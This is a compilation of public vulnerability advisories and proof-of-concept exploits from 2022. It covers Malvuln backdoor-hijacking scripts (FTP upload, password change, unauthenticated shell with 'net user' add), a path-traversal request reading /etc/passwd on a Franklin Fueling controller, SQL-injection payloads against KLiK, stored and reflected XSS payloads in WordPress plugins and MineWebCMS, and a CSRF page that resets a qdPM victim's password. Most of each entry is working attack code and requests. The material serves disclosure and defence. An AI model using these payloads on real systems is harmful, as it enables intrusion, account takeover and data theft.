<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/ea9ab5983a6fa71e31907e74d4ddbab6.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.FTP.Lana.01.d<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Lana<br />Type: PE32<br />MD5: ea9ab5983a6fa71e31907e74d4ddbab6<br />Vuln ID: MVID-2022-0539<br />Dropped files: sersvc32.exe<br />Disclosure: 04/06/2022<br />Description: The malware listens in TCP port 9003. The credentials "admin" and "secret" are weak and stored in plaintext with the executable.<br /><br />00404004 aAdmin db 'admin',0 ; DATA XREF 00401FBF<br />00404004 ; sub_402765+4A3↑o<br />00404019 aSecret db 'secret',0 ; DATA XREF 00401FA8<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 9003<br />220 Silver FTP v1.1 <br />USER admin <br />331 Password required for admin. <br />PASS secret <br />230 User logged in, proceed. <br />SYST <br />215 UNIX Type: L8 <br />PASV <br />227 Entering Passive Mode (192,168,18,125,195,84). <br />STOR DOOM.exe <br />150 Data connection accepted. <br />226 Transfer ok <br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=50004<br />DOOM="DOOM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /> <br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>==============[ Author ]==============<br />= Name: Momen Eldawakhly (Cyber Guy)<br />= Company: Cypro.se<br />======================================<br /><br />==============[ Product ]==============<br />= Vendor: Franklin Fueling Systems<br />= Product: FFS Colibri Controller Module<br />= Version: 1.8.19.8580<br />======================================<br /><br /><br />============[ HTTP Exploitation ]============<br /><br />GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1<br />Host: 192.168.1.6<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />DNT: 1<br />Connection: close<br />Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B<br />Upgrade-Insecure-Requests: 1<br /><br />============[ URL Exploitation ]============<br /><br />http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/2906b5dc5132dd1319827415e837168f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.XLog.21<br />Vulnerability: Authentication Bypass Race Condition<br />Description: The malware listens on TCP port 5553. Third-party attackers who can reach the system before a password has been set can logon using default credentials of noname/nopass and run commands made avail by the backdoor including changing the password therby potentially locking out the original intruder.<br /><br />Incorrect username "victim|pass" we get<br />Received invalid name parameter!<br /><br />Incorrect password "noname|pass" we get<br />Received incorrect password from client!<br /><br />Sending correct noname|nopass creds we get no error. Next, we must send valid cmds using correct pipe delimiter or we will get "Received invalid parameter" errors.<br /><br /> push offset aCmdChangepass ; "cmd changepass"<br />004018EA mov edx, [ebp+Str1]<br />004018ED push edx ; Str1<br />004018EE call _strcmp<br />004018F3 add esp, 8<br />004018F6 test eax, eax<br />004018F8 jnz loc_4019A6<br />004018FE lea eax, [ebp+Delimiter]<br />00401901 push eax ; Delimiter<br />00401902 push 0 ; String<br />00401904 call _strtok<br />00401909 add esp, 8<br />0040190C mov [ebp+Str1], eax<br />0040190F cmp [ebp+Str1], 0<br />00401913 jnz short loc_401930<br />00401915 push offset aReceivedInvali_4 ; "\r\nReceived invalid parameter (NULL) f"...<br />0040191A mov ecx, [ebp+s]<br />0040191D push ecx ; s<br />0040191E call sub_4019D9<br /><br />Family: XLog<br />Type: PE32<br />MD5: 2906b5dc5132dd1319827415e837168f<br />Vuln ID: MVID-2022-0543<br />Disclosure: 04/06/2022<br /><br /><br />Exploit/PoC:<br />from socket import *<br />import time<br /><br />MALWARE_HOST="x.x.x.x"<br />PORT=5553<br /><br />def chk_res(s):<br /> res=""<br /> while True:<br /> res += s.recv(512)<br /> break<br /> if "\0" in res or "\n" in res or res == "":<br /> break<br /> return res<br /><br />def doit():<br /><br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> #Change the backdoors password so we PWN it!.<br /> PAYLOAD="noname|nopass|cmd:changepass|malvuln"<br /> s.send(PAYLOAD)<br /> time.sleep(0.5)<br /><br /> #See whats the malware about<br /> PAYLOAD="noname|malvuln|cmd:about"<br /> s.send(PAYLOAD)<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /> <br /> #Terminate the backdoor<br /> PAYLOAD="noname|malvuln|cmd:kill"<br /> s.send(PAYLOAD)<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /><br /> s.close()<br /><br /><br />if __name__=="__main__":<br /> doit()<br /> print("Malvuln")<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/82641dabbb1f73dd775e200466a07ec1.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Verify.h<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP ports 1906 and 1907. Third-party adversaries who can reach an infected host on either port can gain access and or run any OS command.<br />Family: Verify<br />Type: PE32<br />MD5: 82641dabbb1f73dd775e200466a07ec1<br />Vuln ID: MVID-2022-0538<br />Disclosure: 04/06/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 1907<br />Welcome to pMK_Veryfun v2082 SHELL. Have fun ^.^ !<br /><br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />c:\>net user APPARITIONSEC 666 /add<br />net user APPARITIONSEC 666 /add<br />The command completed successfully.<br /><br />c:\>calc<br />calc<br /><br />C:\>nc64.exe x.x.x.x 1906<br />Welcome to pMK_Veryfun v2082, type "help" or "helpv" for more information.<br />Version [2082] - 4 Apr 2005 - Written by [pMK] - x0x0x0x0x0x0x0 [pTH]<br />Access granted! My IP is [192.168.18.125|DESKTOP-2C3IQHO]<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: KLiK Social Media Website 1.0 - 'Multiple' SQLi<br /># Date: April 1st, 2022<br /># Exploit Author: corpse<br /># Vendor Homepage: https://github.com/msaad1999/KLiK-SocialMediaWebsite<br /># Software Link: https://github.com/msaad1999/KLiK-SocialMediaWebsite<br /># Version: 1.0<br /># Tested on: Debian 11<br /><br />Parameter: poll (GET)<br /> Type: time-based blind<br /> Title: MySQL time-based blind - Parameter replace (ELT)<br /> Payload: poll=ELT(1079=1079,SLEEP(5))<br /><br />Parameter: pollID (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND 1248=1248<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: voteOpt=26&voteSubmit=Submit Vote&pollID=15 AND (SELECT 7786 FROM (SELECT(SLEEP(5)))FihS)<br /><br />Parameter: voteOpt (POST)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: voteOpt=(SELECT (CASE WHEN (7757=7757) THEN 26 ELSE (SELECT 1548 UNION SELECT 8077) END))&voteSubmit=Submit Vote&pollID=15<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: voteOpt=26 AND (SELECT 8024 FROM (SELECT(SLEEP(5)))DZnp)&voteSubmit=Submit Vote&pollID=15<br /><br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin WP Downgrade < 1.2.3 - Admin + Stored Cross-Site Scripting<br /><br />References:<br />CVE-2022-1001<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin only perform client side validation of its "WordPress Target Version" settings, but does not sanitise and escape it server side, allowing high privilege users such as admin to perform Cross-Site attacks even when the unfiltered_html capability is disallowed.<br /><br />Affects Plugins:<br />wp-downgrade - Fixed in version 1.2.3<br /><br />Proof of Concept:<br />Access the settings of the plugin (/wp-admin/options-general.php?page=wp_downgrade) and remove the max length as well as pattern attribute on the "WordPress Target Version" settings field, then put the following payload in it and save: <script>alert(/XSS/)</script> <br /><br />Classification<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba<br /><br />TracWordpress:<br />https://plugins.trac.wordpress.org/changeset/2696091<br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin UpdraftPlus < 1.22.9 - Reflected Cross-Site Scripting<br /><br />References:<br />CVE-2022-0864<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.<br /><br />Affects Plugins:<br />Updraftplus - Fixed in version 1.22.9<br /><br />Proof of Concept:<br />https://example.com//wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(1)</script><br /><br />Classification<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/7337543f-4c2c-4365-aebf-3423e9d2f872<br /></code></pre>
<pre><code># Exploit Title: qdPM 9.2 - Cross-site Request Forgery (CSRF)<br /># Google Dork: NA<br /># Date: 03/27/2022<br /># Exploit Author: Chetanya Sharma @AggressiveUser<br /># Vendor Homepage: https://qdpm.net/<br /># Software Link: https://sourceforge.net/projects/qdpm/files/latest/download<br /># Version: 9.2<br /># Tested on: KALI OS<br /># CVE : CVE-2022-26180<br />#<br />---------------<br /><br />Steps to Exploit : <br /> 1) Make an HTML file of given POC (Change UserID field Accordingly)and host it.<br /> 2) send it to victim.<br /><br /><html><title>qdPM Open Source Project Management - qdPM 9.2 (CSRF POC)</title><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="https://qdpm.net/demo/9.2/index.php/myAccount/update" method="POST"><br /> <input type="hidden" name="sf_method" value="put" /><br /> <input type="hidden" name="users[id]" value="1" /> <!-- Change User ID Accordingly ---><br /> <input type="hidden" name="users[photo_preview]" value="" /><br /> <input type="hidden" name="users[name]" value="AggressiveUser" /><br /> <input type="hidden" name="users[new_password]" value="TEST1122" /><br /> <input type="hidden" name="users[email]" value="administrator@Lulz.com" /><br /> <input type="hidden" name="users[photo]" value="" /><br /> <input type="hidden" name="users[culture]" value="en" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /></code></pre>
<pre><code># Exploit Title: minewebcms 1.15.2 - Cross-site Scripting (XSS)<br /># Google Dork: NA<br /># Date: 02/20/2022<br /># Exploit Author: Chetanya Sharma @AggressiveUser<br /># Vendor Homepage: https://mineweb.org/<br /># Software Link: https://github.com/mineweb/minewebcms<br /># Version: 1.15.2<br /># Tested on: KALI OS<br /># CVE : CVE-2022-1163<br />#<br />---------------<br /><br />Steps to Reproduce:-<br />=> Install the WebApp and Setup it<br />=> Login in to webAPP using Admin Creds. <br />=> Navigate to "http://localhost/MineWebCMS-1.15.2/admin/navbar"<br />=> Add/Edit a Link Select "Drop-Down Menu"<br />=> "Link Name" and "URL" Both Input are Vulnerable to Exploit Simple XSS <br />=> Payload : <script>alert(1);</script><br />=> XSS will trigger on "http://localhost/MineWebCMS-1.15.2/" Aka WebApp HOME Page<br /><br />Note : As you can see this simple payload working in those two inputs as normally . Whole WebApp Admin Input Structure is allow to do HTML Injection or XSS Injection <br /><br />References: https://huntr.dev/bounties/44d40f34-c391-40c0-a517-12a2c0258149/<br /><br /></code></pre>
<pre><code>Tittle:<br />WordPress Plugin Hummingbird < 3.3.2 - Admin+ Stored Cross-Site Scripting<br /><br />References:<br />CVE-2022-0994<br /><br />Author:<br />Taurus Omar <br /><br />Description:<br />The plugin does not sanitise and escape the Config Name, which could allow high privilege users, such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.<br /><br />Affects Plugins:<br />Hummingbird-performance - Fixed in version 3.3.2<br /><br />Proof of Concept:<br />Go to Hummingbird's Settings > Configs > edit the "Name and Description" and put the following payload in the Name field: <img src onerror=alert(/XSS/)><br /><br />Save and Click 'Apply' to trigger the XSS<br /><br />Go to Hummingbird's Settings > Configs and Upload the following config<br /><br />{<br /> "id": 1,<br /> "name": "<img src onerror=alert(/XSS/)>",<br /> "description": "Xss",<br /> "config": {<br /> "configs": {<br /> "settings": {<br /> "advanced": {<br /> "query_string": false,<br /> "emoji": false,<br /> "cart_fragments": false,<br /> "lazy_load": {<br /> "enabled": false<br /> }<br /> },<br /> "database": {<br /> "reports": {<br /> "enabled": false<br /> }<br /> },<br /> "gravatar": {<br /> "enabled": true<br /> },<br /> "page_cache": {<br /> "enabled": true,<br /> "detection": "auto",<br /> "integrations": {<br /> "varnish": false,<br /> "opcache": false<br /> },<br /> "preload": false<br /> },<br /> "performance": [],<br /> "rss": {<br /> "enabled": true,<br /> "duration": 3600<br /> },<br /> "settings": {<br /> "accessible_colors": false,<br /> "remove_settings": false,<br /> "remove_data": false,<br /> "control": true<br /> },<br /> "uptime": {<br /> "enabled": false<br /> }<br /> }<br /> },<br /> "strings": {<br /> "advanced": [<br /> "Remove query strings from assets - Inactive\nRemove Emoji JS & CSS files - Inactive\nDisable WooCommerce cart fragments - Inactive\nComments lazy loading - Inactive\n"<br /> ],<br /> "database": [<br /> ""<br /> ],<br /> "gravatar": [<br /> "Gravatar cache - Active\n"<br /> ],<br /> "page_cache": [<br /> "Page cache - Active\nFile change detection - Auto\nPurge Varnish cache - Inactive\nPurge OpCache - Inactive\nCache preloading - Inactive\n"<br /> ],<br /> "rss": [<br /> "RSS caching - Active\n"<br /> ],<br /> "settings": [<br /> "High contrast mode - Inactive\nRemove settings on uninstall - Inactive\nRemove data on uninstall - Inactive\nCache control in admin bar - Active\n"<br /> ],<br /> "uptime": [<br /><br /> "Uptime - Inactive\n"<br /> ]<br /> }<br /> },<br /><br /> "plugin": "1081721"<br />} <br /><br />Classification:<br />Type XSS <br />OWASP top 10 A7: Cross-Site Scripting (XSS)<br />CWE-79<br /><br />wpScan:<br />https://wpscan.com/vulnerability/e9dd62fc-bb79-4a6b-b99c-60e40f010d7a<br /><br /></code></pre>